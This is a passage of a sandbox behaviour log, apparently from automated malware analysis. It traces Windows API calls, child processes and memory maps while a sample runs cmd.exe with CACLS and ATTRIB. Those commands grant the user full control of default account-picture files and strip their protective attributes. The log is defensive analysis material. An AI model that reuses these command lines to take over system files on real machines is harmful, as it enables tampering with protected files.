dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0181.998] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0181.999] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x30f314*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30f360 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x30f360*(hProcess=0x50, hThread=0x4c, dwProcessId=0xc2c, dwThreadId=0xd1c)) returned 1 [0182.001] CloseHandle (hObject=0x4c) returned 1 [0182.001] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0182.001] GetEnvironmentStringsW () returned 0x400308* [0182.001] FreeEnvironmentStringsW (penv=0x400308) returned 1 [0182.001] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0182.037] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x30f254 | out: lpExitCode=0x30f254*=0x0) returned 1 [0182.037] CloseHandle (hObject=0x50) returned 1 [0182.037] _vsnwprintf (in: _Buffer=0x30f39c, _BufferCount=0x13, _Format="%08X", _ArgList=0x30f260 | out: _Buffer="00000000") returned 8 [0182.037] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0182.037] GetEnvironmentStringsW () returned 0x402410* [0182.037] FreeEnvironmentStringsW (penv=0x402410) returned 1 [0182.037] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0182.037] GetEnvironmentStringsW () returned 0x402410* [0182.037] FreeEnvironmentStringsW (penv=0x402410) returned 1 [0182.037] DeleteProcThreadAttributeList (in: lpAttributeList=0x30f2b8 | out: lpAttributeList=0x30f2b8) [0182.037] GetConsoleTitleW (in: lpConsoleTitle=0x30f69c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.038] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0182.038] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0182.038] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0182.038] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x30ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ef38) returned 0xffffffff [0182.038] GetLastError () returned 0x2 [0182.038] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x30ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ef38) returned 0xffffffff [0182.038] GetLastError () returned 0x2 [0182.038] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x30ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ef38) returned 0x3fe4d8 [0182.038] FindClose (in: hFindFile=0x3fe4d8 | out: hFindFile=0x3fe4d8) returned 1 [0182.039] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x30ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ef38) returned 0xffffffff [0182.039] GetLastError () returned 0x2 [0182.039] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x30ef38, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ef38) returned 0x3fe4d8 [0182.039] FindClose (in: hFindFile=0x3fe4d8 | out: hFindFile=0x3fe4d8) returned 1 [0182.039] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0182.039] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0182.039] GetConsoleTitleW (in: lpConsoleTitle=0x30f430, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.039] InitializeProcThreadAttributeList (in: lpAttributeList=0x30f2b8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30f380 | out: lpAttributeList=0x30f2b8, lpSize=0x30f380) returned 1 [0182.039] UpdateProcThreadAttribute (in: lpAttributeList=0x30f2b8, dwFlags=0x0, Attribute=0x60001, lpValue=0x30f378, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30f2b8, lpPreviousValue=0x0) returned 1 [0182.039] GetStartupInfoW (in: lpStartupInfo=0x30f274 | out: lpStartupInfo=0x30f274*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0182.039] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0182.039] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x30f314*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30f360 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp\"", lpProcessInformation=0x30f360*(hProcess=0x4c, hThread=0x50, dwProcessId=0xca0, dwThreadId=0xcb4)) returned 1 [0182.041] CloseHandle (hObject=0x50) returned 1 [0182.041] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0182.041] GetEnvironmentStringsW () returned 0x402410* [0182.041] FreeEnvironmentStringsW (penv=0x402410) returned 1 [0182.041] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0182.203] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x30f254 | out: lpExitCode=0x30f254*=0x0) returned 1 [0182.203] CloseHandle (hObject=0x4c) returned 1 [0182.203] _vsnwprintf (in: _Buffer=0x30f39c, _BufferCount=0x13, _Format="%08X", _ArgList=0x30f260 | out: _Buffer="00000000") returned 8 [0182.203] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0182.203] GetEnvironmentStringsW () returned 0x402410* [0182.203] FreeEnvironmentStringsW (penv=0x402410) returned 1 [0182.203] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0182.203] GetEnvironmentStringsW () returned 0x402410* [0182.204] FreeEnvironmentStringsW (penv=0x402410) returned 1 [0182.204] DeleteProcThreadAttributeList (in: lpAttributeList=0x30f2b8 | out: lpAttributeList=0x30f2b8) [0182.204] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.204] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0182.204] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.204] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0182.204] _get_osfhandle (_FileHandle=0) returned 0x3 [0182.204] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0182.204] SetConsoleInputExeNameW () returned 0x1 [0182.204] GetConsoleOutputCP () returned 0x1b5 [0182.204] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0182.204] SetThreadUILanguage (LangId=0x0) returned 0x409 [0182.204] exit (_Code=0) Process: id = "344" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16a80" os_pid = "0xc2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "343" os_parent_pid = "0xbf4" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25613 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25614 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25615 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25616 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 25617 start_va = 0x4a0000 end_va = 0x4a8fff entry_point = 0x4a0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 25618 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25619 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25620 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25621 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 25622 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25623 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25624 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25625 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25626 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 25627 start_va = 0x620000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 25628 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25629 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25630 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25631 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25632 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25633 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25634 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 495 os_tid = 0xd1c Thread: id = 496 os_tid = 0xd28 Process: id = "345" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16a80" os_pid = "0xca0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "343" os_parent_pid = "0xbf4" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25635 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25636 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25637 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25638 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 25639 start_va = 0x640000 end_va = 0x646fff entry_point = 0x640000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 25640 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25641 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25642 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25643 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 25644 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25645 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25646 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25647 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25648 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 25649 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 25650 start_va = 0x6dea0000 end_va = 0x6debcfff entry_point = 0x6dea0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 25651 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25652 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25653 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25654 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25655 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25656 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25657 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 25658 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25659 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25660 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25661 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25662 start_va = 0x290000 end_va = 0x357fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 25663 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25664 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 497 os_tid = 0xcb4 Process: id = "346" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0xcb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25665 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25666 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25667 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25668 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 25669 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 25670 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25671 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25672 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25673 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 25674 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25675 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25676 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25677 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25678 start_va = 0x110000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 25679 start_va = 0x430000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 25680 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 25681 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25682 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25683 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25684 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25685 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 25686 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25687 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25688 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25689 start_va = 0x290000 end_va = 0x357fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 25690 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25691 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 25692 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 25693 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 25694 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 25695 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 25696 start_va = 0x530000 end_va = 0x630fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 25697 start_va = 0x640000 end_va = 0x123ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 25698 start_va = 0x1240000 end_va = 0x13a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Region: id = 25699 start_va = 0x13b0000 end_va = 0x167efff entry_point = 0x13b0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 498 os_tid = 0x51c [0182.338] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fe9c | out: lpSystemTimeAsFileTime=0x28fe9c*(dwLowDateTime=0xa1953560, dwHighDateTime=0x1d440a9)) [0182.338] GetCurrentProcessId () returned 0xcb0 [0182.338] GetCurrentThreadId () returned 0x51c [0182.338] GetTickCount () returned 0x34430 [0182.338] QueryPerformanceCounter (in: lpPerformanceCount=0x28fe94 | out: lpPerformanceCount=0x28fe94*=23912823145) returned 1 [0182.340] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0182.340] __set_app_type 